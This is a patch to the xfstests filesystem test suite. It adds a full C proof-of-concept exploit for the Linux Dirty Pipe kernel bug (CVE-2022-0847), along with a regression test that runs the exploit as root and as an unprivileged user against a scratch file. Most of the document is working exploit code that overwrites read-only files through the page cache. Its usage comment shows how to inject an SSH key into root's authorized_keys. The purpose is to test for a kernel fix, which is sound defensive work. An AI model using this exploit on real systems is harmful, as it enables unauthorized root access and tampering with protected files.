--- /dev/null
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Copyright 2022 CM4all GmbH / IONOS SE
+ *
+ * author: Max Kellermann <max.kellermann@ionos.com>
+ *
+ * Proof-of-concept exploit for the Dirty Pipe
+ * vulnerability (CVE-2022-0847) caused by an uninitialized
+ * "pipe_buffer.flags" variable. It demonstrates how to overwrite any
+ * file contents in the page cache, even if the file is not permitted
+ * to be written, immutable or on a read-only mount.
+ *
+ * This exploit requires Linux 5.8 or later; the code path was made
+ * reachable by commit f6dd975583bd ("pipe: merge
+ * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
+ * there before, it just provided an easy way to exploit it.
+ *
+ * There are two major limitations of this exploit: the offset cannot
+ * be on a page boundary (it needs to write one byte before the offset
+ * to add a reference to this page to the pipe), and the write cannot
+ * cross a page boundary.
+ *
+ * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
+ *
+ * Further explanation: https://dirtypipe.cm4all.com/
+ */
+#ifndef _GNU_SOURCE
+#define _GNU_SOURCE
+#endif
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/user.h>
+
+/**
+ * Create a pipe where all "bufs" on the pipe_inode_info ring have the
+ * PIPE_BUF_FLAG_CAN_MERGE flag set.
+ */
+static void prepare_pipe(int p[2])
+{
+ if (pipe(p)) {
+ perror("pipe failed");
+ abort();
+ }
+
+ const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
+ static char buffer[4096];
+
+ /* fill the pipe completely; each pipe_buffer will now have
+ the PIPE_BUF_FLAG_CAN_MERGE flag */
+ for (unsigned r = pipe_size; r > 0;) {
+ unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+ write(p[1], buffer, n);
+ r -= n;
+ }
+
+ /* drain the pipe, freeing all pipe_buffer instances (but
+ leaving the flags initialized) */
+ for (unsigned r = pipe_size; r > 0;) {
+ unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+ read(p[0], buffer, n);
+ r -= n;
+ }
+
+ /* the pipe is now empty, and if somebody adds a new
+ pipe_buffer without initializing its "flags", the buffer
+ will be mergeable */
+}
+
+int main(int argc, char **argv)
+{
+ if (argc != 4) {
+ fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
+ return EXIT_FAILURE;
+ }
+
+ /* dumb command-line argument parser */
+ const char *const path = argv[1];
+ loff_t offset = strtoul(argv[2], NULL, 0);
+ const char *const data = argv[3];
+ const size_t data_size = strlen(data);
+ int page_size = sysconf(_SC_PAGESIZE);
+ if (page_size == -1)
+ page_size = 4096;
+
+ if (offset % page_size == 0) {
+ fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
+ return EXIT_FAILURE;
+ }
+
+ const loff_t next_page = (offset | (page_size - 1)) + 1;
+ const loff_t end_offset = offset + (loff_t)data_size;
+ if (end_offset > next_page) {
+ fprintf(stderr, "Sorry, cannot write across a page boundary\n");
+ return EXIT_FAILURE;
+ }
+
+ /* open the input file and validate the specified offset */
+ const int fd = open(path, O_RDONLY); // yes, read-only! :-)
+ if (fd < 0) {
+ perror("open failed");
+ return EXIT_FAILURE;
+ }
+
+ struct stat st;
+ if (fstat(fd, &st)) {
+ perror("stat failed");
+ return EXIT_FAILURE;
+ }
+
+ if (offset > st.st_size) {
+ fprintf(stderr, "Offset is not inside the file\n");
+ return EXIT_FAILURE;
+ }
+
+ if (end_offset > st.st_size) {
+ fprintf(stderr, "Sorry, cannot enlarge the file\n");
+ return EXIT_FAILURE;
+ }
+
+ /* create the pipe with all flags initialized with
+ PIPE_BUF_FLAG_CAN_MERGE */
+ int p[2];
+ prepare_pipe(p);
+
+ /* splice one byte from before the specified offset into the
+ pipe; this will add a reference to the page cache, but
+ since copy_page_to_iter_pipe() does not initialize the
+ "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
+ --offset;
+ ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
+ if (nbytes < 0) {
+ perror("splice failed");
+ return EXIT_FAILURE;
+ }
+ if (nbytes == 0) {
+ fprintf(stderr, "short splice\n");
+ return EXIT_FAILURE;
+ }
+
+ /* the following write will not create a new pipe_buffer, but
+ will instead write into the page cache, because of the
+ PIPE_BUF_FLAG_CAN_MERGE flag */
+ nbytes = write(p[1], data, data_size);
+ if (nbytes < 0) {
+ perror("write failed");
+ return EXIT_FAILURE;
+ }
+ if ((size_t)nbytes < data_size) {
+ fprintf(stderr, "short write\n");
+ return EXIT_FAILURE;
+ }
+
+ return EXIT_SUCCESS;
+}
--- /dev/null
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2022 Red Hat, Inc. All Rights Reserved.
+#
+# FS QA Test No. 680
+#
+# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an
+# uninitialized "pipe_buffer.flags" variable, which fixed by:
+# 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer")
+#
+. ./common/preamble
+_begin_fstest auto quick
+
+# real QA test starts here
+_supported_fs generic
+_require_test
+_require_user
+_require_chmod
+_require_test_program "splice2pipe"
+
+localfile=$TEST_DIR/testfile.$seq
+rm -f $localfile
+
+# Create a file with 4k 0xff data, then make sure unprivileged user has readonly
+# permission on it
+$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1
+chmod 0644 $localfile
+# Test privileged user (xfstests generally run with root)
+echo "Test privileged user:"
+$here/src/splice2pipe $localfile 1 "AAAAAAAABBBBBBBB"
+# Part of 0xff will be overwritten if there's CVE-2022-0847 bug
+_hexdump $localfile
+
+# Create a file with 4k 0xff data, then make sure unprivileged user has readonly
+# permission on it
+$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1
+chmod 0644 $localfile
+# Copy splice2pipe to a place which can be run by an unprivileged user (avoid
+# something likes /root/xfstests/src/splice2pipe)
+cp $here/src/splice2pipe $tmp.splice2pipe
+# Test unprivileged user's privilege escalation
+echo "Test unprivileged user:"
+su ${qa_user} -c "$tmp.splice2pipe $localfile 1 AAAAAAAABBBBBBBB"
+_hexdump $localfile
+
+# success, all done
+status=0
+exit
projects / xfstests-dev.git / commitdiff